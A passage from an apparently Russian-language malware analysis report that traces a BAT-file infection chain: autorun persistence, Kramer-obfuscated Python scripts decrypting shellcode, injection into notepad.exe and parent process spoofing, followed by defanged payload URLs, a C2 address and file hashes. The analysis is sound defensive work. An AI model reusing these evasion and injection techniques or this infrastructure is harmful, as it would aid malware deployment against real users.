5.\u00a0\u0417\u0430\u043f\u0443\u0441\u043a Python-\u0441\u043a\u0440\u0438\u043f\u0442\u043e\u0432.<\/p>\n

6.\u00a0\u0417\u0430\u0433\u0440\u0443\u0437\u043a\u0430 \u0434\u043e\u043f\u043e\u043b\u043d\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0445 \u043c\u043e\u0434\u0443\u043b\u0435\u0439.<\/p>\n

7.\u00a0\u0420\u0430\u0437\u043c\u0435\u0449\u0435\u043d\u0438\u0435 \u0434\u043e\u043f\u043e\u043b\u043d\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0445 \u043c\u043e\u0434\u0443\u043b\u0435\u0439 \u0432 \u0430\u0432\u0442\u043e\u0437\u0430\u043f\u0443\u0441\u043a\u0435.<\/p>\n

8.\u00a0\u0417\u0430\u0433\u0440\u0443\u0437\u043a\u0430 \u0434\u043e\u043f\u043e\u043b\u043d\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0445 \u0444\u0430\u0439\u043b\u043e\u0432 \u0438\u0437 \u0438\u043d\u0442\u0435\u0440\u043d\u0435\u0442\u0430 \u0438 \u0438\u0445 \u0440\u0430\u0437\u0430\u0440\u0445\u0438\u0432\u0430\u0446\u0438\u044f.<\/p>\n

\u0421\u043e\u0434\u0435\u0440\u0436\u0438\u043c\u043e\u0435 \u0444\u0430\u0439\u043b\u0430 startuppp.bat (\u0441\u043c. \u0440\u0438\u0441. 8), \u0434\u043e\u0431\u0430\u0432\u043b\u0435\u043d\u043d\u043e\u0433\u043e \u0432 \u0430\u0432\u0442\u043e\u0437\u0430\u043f\u0443\u0441\u043a, \u0442\u0430\u043a\u0436\u0435 \u0437\u0430\u043a\u043e\u0434\u0438\u0440\u043e\u0432\u0430\u043d\u043e. \u041f\u043e\u0441\u043b\u0435 \u043f\u0440\u0435\u043e\u0431\u0440\u0430\u0437\u043e\u0432\u0430\u043d\u0438\u044f \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u043c:<\/p>\n

\"\u0420\u0438\u0441\u0443\u043d\u043e\u043a<\/p>\n
\u0420\u0438\u0441\u0443\u043d\u043e\u043a 9. \u041a\u043e\u043c\u0430\u043d\u0434\u044b \u0432 \u0444\u0430\u0439\u043b\u0435 startuppp.bat<\/em><\/figcaption><\/div>\n<\/figure>\n

\u0418\u0437 \u043a\u043e\u043c\u0430\u043d\u0434 \u0432 \u0444\u0430\u0439\u043b\u0435 startuppp.bat \u043f\u043e\u043d\u044f\u0442\u043d\u043e, \u0447\u0442\u043e \u043e\u043d \u043e\u0442\u0432\u0435\u0447\u0430\u0435\u0442 \u0437\u0430 \u0437\u0430\u043f\u0443\u0441\u043a \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0438\u0445 \u0441\u043a\u0430\u0447\u0430\u043d\u043d\u044b\u0445 \u0438 \u0440\u0430\u0437\u0430\u0440\u0445\u0438\u0432\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0445 \u0441\u043a\u0440\u0438\u043f\u0442\u043e\u0432 Python. \u041d\u0430 \u043c\u043e\u043c\u0435\u043d\u0442 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u044f \u0432\u0441\u0435 \u0444\u0430\u0439\u043b\u044b \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b \u0438 \u0438\u0445 \u043c\u043e\u0436\u043d\u043e \u0441\u043a\u0430\u0447\u0430\u0442\u044c, \u043d\u0430\u043f\u0440\u0438\u043c\u0435\u0440, \u043f\u0440\u0438 \u043f\u043e\u043c\u043e\u0449\u0438 \u0431\u0440\u0430\u0443\u0437\u0435\u0440\u0430.<\/p>\n

\u041f\u043e\u0441\u043c\u043e\u0442\u0440\u0438\u043c \u0434\u043b\u044f \u043f\u0440\u0438\u043c\u0435\u0440\u0430 \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u043c\u043e\u0435 \u043e\u0434\u043d\u043e\u0433\u043e \u0438\u0437 \u0430\u0440\u0445\u0438\u0432\u043e\u0432, \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u0435\u043d\u043d\u044b\u0445 \u043d\u0430 \u0440\u0438\u0441\u0443\u043d\u043a\u0435 10.<\/p>\n

\"\u0420\u0438\u0441\u0443\u043d\u043e\u043a<\/p>\n
\u0420\u0438\u0441\u0443\u043d\u043e\u043a 10. \u0421\u043e\u0434\u0435\u0440\u0436\u0438\u043c\u043e\u0435 \u0430\u0440\u0445\u0438\u0432\u0430 <\/em>FTSP.zip<\/em><\/a><\/figcaption><\/div>\n<\/figure>\n

\u0421\u043b\u0435\u0434\u0443\u0435\u0442 \u043e\u0431\u0440\u0430\u0442\u0438\u0442\u044c \u0432\u043d\u0438\u043c\u0430\u043d\u0438\u0435 \u043d\u0430 \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0435 \u0444\u0430\u0439\u043b\u044b: fv1.py, fv2.py, fv3.py, fv4.py, fv5.py, fv6.py, yam1.py, yam2.py, yam3.py, yam4.py, yam5.py, yam6.py. \u041f\u0440\u0438 \u043e\u0442\u043a\u0440\u044b\u0442\u0438\u0438 \u043b\u044e\u0431\u043e\u0433\u043e \u0438\u0437 \u043d\u0438\u0445 \u0434\u043b\u044f \u0447\u0442\u0435\u043d\u0438\u044f \u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u0441\u044f \u043f\u043e\u043d\u044f\u0442\u043d\u043e, \u0447\u0442\u043e \u044d\u0442\u043e \u0441\u043a\u043e\u043c\u043f\u0438\u043b\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0435 \u0444\u0430\u0439\u043b\u044b Python. <\/p>\n

\"\u0420\u0438\u0441\u0443\u043d\u043e\u043a<\/p>\n
\u0420\u0438\u0441\u0443\u043d\u043e\u043a 11. \u0424\u0440\u0430\u0433\u043c\u0435\u043d\u0442 \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u043c\u043e\u0433\u043e \u0444\u0430\u0439\u043b\u0430 yam1.py<\/em><\/figcaption><\/div>\n<\/figure>\n

\u0412\u043e\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c\u0441\u044f \u0440\u0435\u0441\u0443\u0440\u0441\u043e\u043c \u0434\u043b\u044f \u0434\u0435\u043a\u043e\u043c\u043f\u0438\u043b\u044f\u0446\u0438\u0438 PyLingual<\/a>. \u0414\u043b\u044f \u043f\u0440\u0438\u043c\u0435\u0440\u0430 \u0432\u043e\u0437\u044c\u043c\u0435\u043c \u0444\u0430\u0439\u043b yam1.py, \u043f\u0440\u0435\u0434\u0432\u0430\u0440\u0438\u0442\u0435\u043b\u044c\u043d\u043e \u0438\u0437\u043c\u0435\u043d\u0438\u0432 \u0440\u0430\u0441\u0448\u0438\u0440\u0435\u043d\u0438\u0435 \u043d\u0430 .pyc.<\/p>\n

\"\u0420\u0438\u0441\u0443\u043d\u043e\u043a<\/p>\n
\u0420\u0438\u0441\u0443\u043d\u043e\u043a 12. \u0420\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442 \u0434\u0435\u043a\u043e\u043c\u043f\u0438\u043b\u044f\u0446\u0438\u0438 \u0444\u0430\u0439\u043b\u0430 yam1.pyc<\/em><\/figcaption><\/div>\n<\/figure>\n

\u0415\u0441\u043b\u0438 \u0432\u043d\u0438\u043c\u0430\u0442\u0435\u043b\u044c\u043d\u043e \u043f\u043e\u0441\u043c\u043e\u0442\u0440\u0435\u0442\u044c \u043d\u0430 \u043a\u043e\u0434 \u043d\u0430 \u0440\u0438\u0441\u0443\u043d\u043a\u0435 12, \u0442\u043e \u043c\u043e\u0436\u043d\u043e \u0443\u0432\u0438\u0434\u0435\u0442\u044c class Kramer. \u041f\u043e\u0441\u043b\u0435 \u0430\u043d\u0430\u043b\u0438\u0437\u0430 \u043a\u043e\u0434\u0430 \u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u0441\u044f \u044f\u0441\u043d\u043e, \u0447\u0442\u043e \u043a \u0444\u0430\u0439\u043b\u0443 \u0431\u044b\u043b\u0430 \u043f\u0440\u0438\u043c\u0435\u043d\u0435\u043d\u0430 \u043e\u0431\u0444\u0443\u0441\u043a\u0430\u0446\u0438\u044f \u043f\u0440\u0438 \u043f\u043e\u043c\u043e\u0449\u0438 \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u044f Kramer<\/a>. \u0412\u043e\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c\u0441\u044f \u0434\u0435\u043e\u0431\u0444\u0443\u0441\u043a\u0430\u0442\u043e\u0440\u043e\u043c kramer-specter_deobf<\/a>. \u041f\u043e\u0441\u043b\u0435 \u0434\u0435\u043e\u0431\u0444\u0443\u0441\u043a\u0430\u0446\u0438\u0438 \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u043c \u043a\u043e\u0434.<\/p>\n

\"\u0420\u0438\u0441\u0443\u043d\u043e\u043a<\/p>\n
\u0420\u0438\u0441\u0443\u043d\u043e\u043a 13. \u0424\u0440\u0430\u0433\u043c\u0435\u043d\u0442 \u043a\u043e\u0434\u0430 \u043f\u043e\u0441\u043b\u0435 \u0434\u0435\u043e\u0431\u0444\u0443\u0441\u043a\u0430\u0446\u0438\u0438<\/em><\/figcaption><\/div>\n<\/figure>\n

\u041f\u0440\u0438 \u0447\u0442\u0435\u043d\u0438\u0438 \u043a\u043e\u0434\u0430 \u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u0441\u044f \u043f\u043e\u043d\u044f\u0442\u043d\u043e, \u0447\u0442\u043e \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0439 \u0441\u043a\u0440\u0438\u043f\u0442 \u0440\u0430\u0441\u0448\u0438\u0444\u0440\u043e\u0432\u044b\u0432\u0430\u0435\u0442 \u0448\u0435\u043b\u043b\u043a\u043e\u0434, \u0437\u0430\u043f\u0438\u0441\u044b\u0432\u0430\u0435\u0442 \u0435\u0433\u043e \u0432 \u0432\u044b\u0434\u0435\u043b\u0435\u043d\u043d\u0443\u044e \u043f\u0430\u043c\u044f\u0442\u044c \u0438 \u0438\u0441\u043f\u043e\u043b\u043d\u044f\u0435\u0442. \u0410\u043b\u0433\u043e\u0440\u0438\u0442\u043c \u0434\u043b\u044f \u0432\u0441\u0435\u0445 \u0444\u0430\u0439\u043b\u043e\u0432 (fv1.py, fv2.py, fv3.py, fv4.py, fv5.py, fv6.py, yam1.py, yam2.py, yam3.py, yam4.py, yam5.py, yam6.py) \u043e\u0434\u0438\u043d\u0430\u043a\u043e\u0432. \u0421\u0430\u043c \u0440\u0430\u0441\u0448\u0438\u0444\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0439 \u0448\u0435\u043b\u043b\u043a\u043e\u0434 \u043c\u043e\u0436\u043d\u043e \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u043f\u0440\u0438\u043c\u0435\u043d\u0438\u0432 \u0441\u043f\u043e\u0441\u043e\u0431, \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u0435\u043d\u043d\u044b\u0439 \u043d\u0430 \u0440\u0438\u0441\u0443\u043d\u043a\u0435 14, \u0430 \u0434\u0430\u043b\u044c\u0448\u0435 \u2014 \u043f\u043e\u043f\u0440\u043e\u0431\u043e\u0432\u0430\u0442\u044c \u0438\u0437\u0443\u0447\u0438\u0442\u044c \u0435\u0433\u043e \u0432 \u0434\u0438\u0437\u0430\u0441\u0441\u0435\u043c\u0431\u043b\u0435\u0440\u0435 \u0438\u043b\u0438 \u043e\u0442\u043b\u0430\u0434\u0447\u0438\u043a\u0435.<\/p>\n

\"\u0420\u0438\u0441\u0443\u043d\u043e\u043a<\/p>\n
\u0420\u0438\u0441\u0443\u043d\u043e\u043a 14. \u0421\u043e\u0445\u0440\u0430\u043d\u0435\u043d\u0438\u0435 \u0448\u0435\u043b\u043b\u043a\u043e\u0434\u0430 \u0432 \u0431\u0438\u043d\u0430\u0440\u043d\u043e\u043c \u0444\u0430\u0439\u043b\u0435<\/em><\/figcaption><\/div>\n<\/figure>\n

\u041f\u0440\u0438 \u0434\u0438\u043d\u0430\u043c\u0438\u0447\u0435\u0441\u043a\u043e\u043c \u0430\u043d\u0430\u043b\u0438\u0437\u0435 \u0430\u043b\u0433\u043e\u0440\u0438\u0442\u043c \u0440\u0430\u0431\u043e\u0442\u044b \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0445 \u0444\u0430\u0439\u043b\u043e\u0432 fv1.py, fv2.py, fv3.py, fv4.py, fv5.py, fv6.py, yam1.py, yam2.py, yam3.py, yam4.py, yam5.py, yam6.py \u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u0441\u044f \u0431\u043e\u043b\u0435\u0435 \u043f\u043e\u043d\u044f\u0442\u043d\u044b\u043c. \u041f\u043e\u0441\u043b\u0435 \u0437\u0430\u043f\u0443\u0441\u043a\u0430 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0433\u043e \u0444\u0430\u0439\u043b\u0430, \u0432 \u0437\u0430\u0432\u0438\u0441\u0438\u043c\u043e\u0441\u0442\u0438 \u043e\u0442 \u0443\u0441\u043b\u043e\u0432\u0438\u0439 (\u0441\u043c. \u0440\u0438\u0441. 9), \u043a\u0430\u0436\u0434\u044b\u0439 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0439 \u043c\u043e\u0434\u0443\u043b\u044c \u2014 \u0438\u0445 \u0432\u0441\u0435\u0433\u043e \u0448\u0435\u0441\u0442\u044c \u2014 \u0438\u043d\u0438\u0446\u0438\u0438\u0440\u0443\u0435\u0442 \u043f\u0440\u043e\u0446\u0435\u0441\u0441 notepad.exe \u0438 \u0432\u043d\u0435\u0434\u0440\u044f\u0435\u0442 \u0432 \u043d\u0435\u0433\u043e \u043a\u043e\u0434. \u0422\u0430\u043a\u0438\u043c \u043e\u0431\u0440\u0430\u0437\u043e\u043c, \u0432 \u0434\u0435\u0440\u0435\u0432\u0435 \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u043e\u0432 \u043f\u043e\u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u0448\u0435\u0441\u0442\u044c \u044d\u043a\u0437\u0435\u043c\u043f\u043b\u044f\u0440\u043e\u0432 notepad.exe, \u043a\u0430\u0436\u0434\u044b\u0439 \u0441 \u0440\u0430\u0437\u043d\u044b\u043c\u0438 \u0438\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0440\u0430\u043c\u0438.<\/p>\n

\u041e\u0441\u043e\u0431\u0435\u043d\u043d\u043e\u0441\u0442\u044c \u0437\u0430\u043a\u043b\u044e\u0447\u0430\u0435\u0442\u0441\u044f \u0432 \u0442\u043e\u043c, \u0447\u0442\u043e \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0435 \u0444\u0430\u0439\u043b\u044b \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442 \u0442\u0435\u0445\u043d\u0438\u043a\u0443 parent process spoofing<\/a>, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0443\u0441\u043b\u043e\u0436\u043d\u044f\u0435\u0442 \u0434\u0435\u0442\u0435\u043a\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0435. \u0412 \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442\u0435, \u0435\u0441\u043b\u0438 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u044c \u043f\u043e\u043b\u0443\u0447\u0438\u0442 \u0441\u043f\u0438\u0441\u043e\u043a \u0438\u0441\u043f\u043e\u043b\u043d\u044f\u0435\u043c\u044b\u0445 \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u043e\u0432 \u0432 \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u043e\u043d\u043d\u043e\u0439 \u0441\u0438\u0441\u0442\u0435\u043c\u0435, \u043e\u043d \u0443\u0432\u0438\u0434\u0438\u0442, \u0447\u0442\u043e \u0434\u043b\u044f \u0432\u0441\u0435\u0445 \u044d\u043a\u0437\u0435\u043c\u043f\u043b\u044f\u0440\u043e\u0432 notepad.exe \u0440\u043e\u0434\u0438\u0442\u0435\u043b\u044c\u0441\u043a\u0438\u043c \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u043e\u043c \u0437\u043d\u0430\u0447\u0438\u0442\u0441\u044f Explorer.exe.<\/p>\n

\"\u0420\u0438\u0441\u0443\u043d\u043e\u043a<\/p>\n
\u0420\u0438\u0441\u0443\u043d\u043e\u043a 15. \u0424\u0440\u0430\u0433\u043c\u0435\u043d\u0442 \u043a\u043e\u0434\u0430 \u0438\u0437 startuppp.bat \u0441 \u043a\u043e\u043c\u043c\u0435\u043d\u0442\u0430\u0440\u0438\u0435\u043c<\/em><\/figcaption><\/div>\n<\/figure>\n
\"\u0420\u0438\u0441\u0443\u043d\u043e\u043a<\/p>\n
\u0420\u0438\u0441\u0443\u043d\u043e\u043a 16. \u0412\u044b\u0432\u043e\u0434 \u0432 \u043a\u043e\u043d\u0441\u043e\u043b\u044c \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438 \u043f\u043e\u0441\u043b\u0435 \u0437\u0430\u043f\u0443\u0441\u043a\u0430 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0433\u043e \u0444\u0430\u0439\u043b\u0430 yam1.py<\/em><\/figcaption><\/div>\n<\/figure>\n

\u0417\u0430\u043a\u043b\u044e\u0447\u0435\u043d\u0438\u0435<\/strong><\/p>\n

\u041f\u0440\u043e\u0432\u0435\u0434\u0435\u043d\u043d\u044b\u0439 \u043d\u0430\u043c\u0438 \u0430\u043d\u0430\u043b\u0438\u0437 \u043f\u043e\u043a\u0430\u0437\u044b\u0432\u0430\u0435\u0442, \u0447\u0442\u043e \u0434\u0430\u0436\u0435 \u043f\u0440\u043e\u0441\u0442\u044b\u0435 \u043a\u0438\u0431\u0435\u0440\u0430\u0442\u0430\u043a\u0438 \u043c\u043e\u0433\u0443\u0442 \u0431\u044b\u0442\u044c \u043c\u043d\u043e\u0433\u043e\u043e\u0431\u0440\u0430\u0437\u043d\u044b \u0438 \u044d\u0444\u0444\u0435\u043a\u0442\u0438\u0432\u043d\u044b. \u041c\u044b \u0440\u0430\u0437\u043e\u0431\u0440\u0430\u043b\u0438 \u0434\u0432\u0430 \u0441\u0446\u0435\u043d\u0430\u0440\u0438\u044f: \u0432 \u043e\u0434\u043d\u043e\u043c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d LNK-\u0444\u0430\u0439\u043b, \u0432 \u0434\u0440\u0443\u0433\u043e\u043c \u2014 BAT-\u0444\u0430\u0439\u043b. \u0412 \u043e\u0431\u043e\u0438\u0445 \u0441\u043b\u0443\u0447\u0430\u044f\u0445 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u043f\u0440\u0438\u043c\u0435\u043d\u044f\u044e\u0442 \u0442\u0435\u0445\u043d\u0438\u043a\u0438 \u0441\u043e\u043a\u0440\u044b\u0442\u0438\u044f \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0433\u043e \u043a\u043e\u0434\u0430 \u0434\u043b\u044f \u043e\u0431\u0445\u043e\u0434\u0430 \u0430\u0432\u0442\u043e\u043c\u0430\u0442\u0438\u0437\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0445 \u0441\u0440\u0435\u0434\u0441\u0442\u0432 \u0437\u0430\u0449\u0438\u0442\u044b \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438. \u042d\u0442\u043e\u0433\u043e \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u0434\u043e\u0441\u0442\u0430\u0442\u043e\u0447\u043d\u043e \u0434\u043b\u044f \u0443\u0441\u043f\u0435\u0448\u043d\u044b\u0445 \u0430\u0442\u0430\u043a \u0432 \u043e\u0431\u043e\u0438\u0445 \u0441\u0446\u0435\u043d\u0430\u0440\u0438\u044f\u0445. \u0414\u0435\u0442\u0430\u043b\u044c\u043d\u044b\u0439 \u0440\u0443\u0447\u043d\u043e\u0439 \u0430\u043d\u0430\u043b\u0438\u0437 \u043f\u043e\u043c\u043e\u0433\u0430\u0435\u0442 \u0432\u044b\u044f\u0432\u0438\u0442\u044c \u0442\u0435\u0445\u043d\u0438\u043a\u0438 \u0438 \u043f\u0440\u043e\u0446\u0435\u0434\u0443\u0440\u044b, \u0430 \u0442\u0430\u043a\u0436\u0435 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0434\u043e\u043f\u043e\u043b\u043d\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0435 \u0438\u043d\u0434\u0438\u043a\u0430\u0442\u043e\u0440\u044b \u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0430\u0446\u0438\u0438, \u0447\u0442\u043e \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043f\u043e\u0441\u0442\u0440\u043e\u0438\u0442\u044c \u043d\u0430\u0434\u0435\u0436\u043d\u0443\u044e \u0437\u0430\u0449\u0438\u0442\u0443.<\/p>\n

IoC (\u0441\u0446\u0435\u043d\u0430\u0440\u0438\u0439 1):<\/strong><\/p>\n

RunScriptProtected.lnk<\/p>\n

7d7b89cb7fa6155b1e01334175ac1c5b<\/p>\n

e777ad0ff4d4510ee345c06c34123b279b0b7ad6<\/p>\n

7c8be71b3cfef2de7343bd48d20e33a6f2f94409d59c50f5ac3a5bbd703789fc<\/p>\n

Payload<\/p>\n

https:\/\/emptyservices[.]xyz\/public\/904e5c82a258472395094ca10082fdfb.txt<\/a><\/p>\n

IoC (\u0441\u0446\u0435\u043d\u0430\u0440\u0438\u0439 2):<\/p>\n

Comman&Control Server<\/p>\n

12.187[.]175.72<\/p>\n

Payload<\/p>\n

http:\/\/dbasopma[.]one:6049\/FTSP.zip<\/a><\/p>\n

http:\/\/dbasopma[.]one:6049\/cam.zip<\/a><\/p>\n

http:\/\/dbasopma[.]one:6049\/bab.zip<\/a><\/p>\n

http:\/\/dbasopma[.]one:6049\/PWS.vbs<\/a><\/p>\n

http:\/\/dbasopma[.]one:6049\/PWS1.vbs<\/a><\/p>\n

http:\/\/dbasopma[.]one:6049\/startuppp.bat<\/a><\/p>\n

\u00a0<\/p>\n

\u00a0<\/p>\n

File<\/p>\n

bab.zip<\/a><\/p>\n

\u00a0<\/p>\n

7be44884a763ee99b69a3388407cff98<\/p>\n

ffb8a0d984e443250676957bfc16d02223e38ce7<\/p>\n

ece1e5b6e77d8da8ecdaed554eb09670f0c1bbf80dadd783b6d904542f72ba0e<\/p>\n

\u00a0<\/p>\n

———————————-<\/p>\n

\u00a0<\/p>\n

\u00a0<\/p>\n

cam.zip<\/a><\/p>\n

\u00a0<\/p>\n

a06c4773ca80b0b7d0fcc05e663cec3d<\/p>\n

825ee18ad6645e7634fc2524af5ef1d394dfab00<\/p>\n

f3661f62ec4a6d8a2077a4f882627c2e039a5270d5e73684881711c712710d23<\/p>\n

\u00a0<\/p>\n

———————————-<\/p>\n

\u00a0<\/p>\n

\u00a0<\/p>\n

FTSP.zip<\/a><\/p>\n

\u00a0<\/p>\n

a7c55ff964188d62485692b6c2061a8a<\/p>\n

80e8b62250ab32810e8da4fe602b29d303b3a247<\/p>\n

12c1d0dc09a545bda4b219bb87fac6b5a222f7c02a414ee26e0ac92162892f92<\/p>\n

\u00a0<\/p>\n

———————————-<\/p>\n

\u00a0<\/p>\n

\u00a0<\/p>\n

new.bat<\/p>\n

\u00a0<\/p>\n

b79e56969d36c4b969bbe1623142e74a<\/p>\n

a7bcc5273b86e75dad66fed8fab1ec546ffa3bfd<\/p>\n

6eb141225c4e4bfe3c347cac44b939ef697616b32e7d3646d6944210d99d0960<\/p>\n

\u00a0<\/p>\n

PWS.vbs<\/p>\n

\u00a0<\/p>\n

2862ffb5ea32ff114bebe41576441b02<\/p>\n

d9e78d276186e5ca049724796494489e228ff431<\/p>\n

0d7cee0c13374181a23e8f605b32f2969c9c490b83c7891318f26bd17777fd7c<\/p>\n

\u00a0<\/p>\n

———————————-<\/p>\n

\u00a0<\/p>\n

\u00a0<\/p>\n

PWS1.vbs<\/p>\n

\u00a0<\/p>\n

06480f1e6aa48daab019e8f1a6b834c9<\/p>\n

c735c2d22e2fe79a39111e76a9966d0720f023a1<\/p>\n

5d932bfda0ffd31715700de2fd43fc89c0f1d89eeabac92081ebe2062da84152<\/p>\n

\u00a0<\/p>\n

\u00a0<\/p>\n

bab.zip<\/a>-\\bab\\Python\\Python312<\/p>\n

\u00a0<\/p>\n

Music-an.py<\/a><\/p>\n

\u00a0<\/p>\n

c437b4a8b925c986d9cd660295e6e2e4<\/p>\n

8bd2e47531a2676448b3e1dc793919edc898fb84<\/p>\n

fa11c54afcffef94b6e0ee284b37d2c4376f0f7d3295f6fb6fa2d67fb607da2f<\/p>\n

\u00a0<\/p>\n

———————————-<\/p>\n

\u00a0<\/p>\n

\u00a0<\/p>\n

Music-as.py<\/a><\/p>\n

\u00a0<\/p>\n

de51465cec3b469fa1f6cab087a47f71<\/p>\n

e0b2eaefe9e4e023e7314dff213fa535e3fb3274<\/p>\n

4c74b2d6f11f51c776c3d15c8cabc530653a57ed3dfd27b3804c81cc975311de<\/p>\n

\u00a0<\/p>\n

———————————-<\/p>\n

\u00a0<\/p>\n

\u00a0<\/p>\n

Music-hv.py<\/a><\/p>\n

\u00a0<\/p>\n

edb374796f6fe20e3b62962811968142<\/p>\n

3d236f99d1f558e6bfc960733e3f46f55199848b<\/p>\n

5bb7b38fb90155537984893cb90375a39815669e728fd84d08accd8b67079198<\/p>\n

\u00a0<\/p>\n

———————————-<\/p>\n

\u00a0<\/p>\n

\u00a0<\/p>\n

Music-uk.py<\/a><\/p>\n

\u00a0<\/p>\n

7e0327b8f7ca202d364b7cd6c66a86be<\/p>\n

adacd10869352a8cf03e9836795b01f7a062377c<\/p>\n

863b88cf2b1c425d01aaad64bcdf4317d704c4041482ea21cceffc26a7fde4ea<\/p>\n

\u00a0<\/p>\n

———————————-<\/p>\n

\u00a0<\/p>\n

\u00a0<\/p>\n

Music-ve.py<\/a><\/p>\n

\u00a0<\/p>\n

f3574e48592f487fe7ad041c6f5bbab7<\/p>\n

4586aff8e8f603adc3785dd5137844658120b16e<\/p>\n

96bd07804ef395303c7ddb88066b607e13d35e339c87d8d1cb6f838e560caddc<\/p>\n

\u00a0<\/p>\n

———————————-<\/p>\n

\u00a0<\/p>\n

\u00a0<\/p>\n

Music-xw3.py<\/a><\/p>\n

\u00a0<\/p>\n

dabb3e0db9cb70b1dcdb011295b41ef4<\/p>\n

279ed2b31867519e834680df2a86e8aa894b61d2<\/p>\n

162c6ad1d8e19372b4ea0dacffae8947e2b1477498cb12c3e5f3a0923f98e33f<\/p>\n

\u00a0<\/p>\n

———————————-<\/p>\n

\u00a0<\/p>\n

\u00a0<\/p>\n

Music-xw5.py<\/a><\/p>\n

\u00a0<\/p>\n

6342a69ed8ea8af5424eb4749e571e97<\/p>\n

dac3c1cac7de687cc427c899202f497c4078be8a<\/p>\n

da82cbbc5da3b329a120540ea4543e31e354e125f7051c0dc35874b5b9a00c9c<\/p>\n

\u00a0<\/p>\n

———————————-<\/p>\n

\u00a0<\/p>\n

\u00a0<\/p>\n

cam.zip<\/a>-\\cam\\Python\\Python312<\/p>\n

\u00a0<\/p>\n

\u00a0<\/p>\n

Music-an.py<\/a><\/p>\n

\u00a0<\/p>\n

027b0fe02fcb8f3abf10941c8a7409aa<\/p>\n

906afab8bdd31666889ff5941c72d79396f69f01<\/p>\n

7023f20f5264c9d83b17d995a07f0cc255fa0861c5bf83101034a430c8ff85d6<\/p>\n

\u00a0<\/p>\n

———————————-<\/p>\n

\u00a0<\/p>\n

\u00a0<\/p>\n

Music-as.py<\/a><\/p>\n

\u00a0<\/p>\n

34f4db87eb50604d1f2dc6862d0ce0d2<\/p>\n

8f887607d01d99fce12eb47ce4cd7632b4a5931f<\/p>\n

8ed0e51fac43d041360f5a7b8b59285f6c98a1f3954401d4c4b8f5a95eface0f<\/p>\n

\u00a0<\/p>\n

———————————-<\/p>\n

\u00a0<\/p>\n

\u00a0<\/p>\n

Music-hv.py<\/a><\/p>\n

\u00a0<\/p>\n

add4dd9dfa71108b7bedadb6e97987e5<\/p>\n

caaa211710b53c9cab8fcdb45772b05e39e3af13<\/p>\n

f136acbb905459aa3292dd65c86361cb863c94d710ade951ac2208a88c36ec6a<\/p>\n

\u00a0<\/p>\n

———————————-<\/p>\n

\u00a0<\/p>\n

\u00a0<\/p>\n

Music-uk.py<\/a><\/p>\n

\u00a0<\/p>\n

baed94b62771a3b551c0462f22561f80<\/p>\n

ea0578a49f184ba9d1271619f9639f586dae591a<\/p>\n

75cf8d1c43fad756cb9c6da084a71ee50bd3d4a46e870df14cdd2135d86681a5<\/p>\n

\u00a0<\/p>\n

———————————-<\/p>\n

\u00a0<\/p>\n

\u00a0<\/p>\n

Music-ve.py<\/a><\/p>\n

\u00a0<\/p>\n

0a8656dd5ea10669617881d384ec531b<\/p>\n

4003ccd4098d2f56255e2bec992cfe978cfc4b6d<\/p>\n

7bb3936b975266dfac275080576000fc368ca7388dd1931f891cc80565c82daa<\/p>\n

\u00a0<\/p>\n

———————————-<\/p>\n

\u00a0<\/p>\n

\u00a0<\/p>\n

Music-xw3.py<\/a><\/p>\n

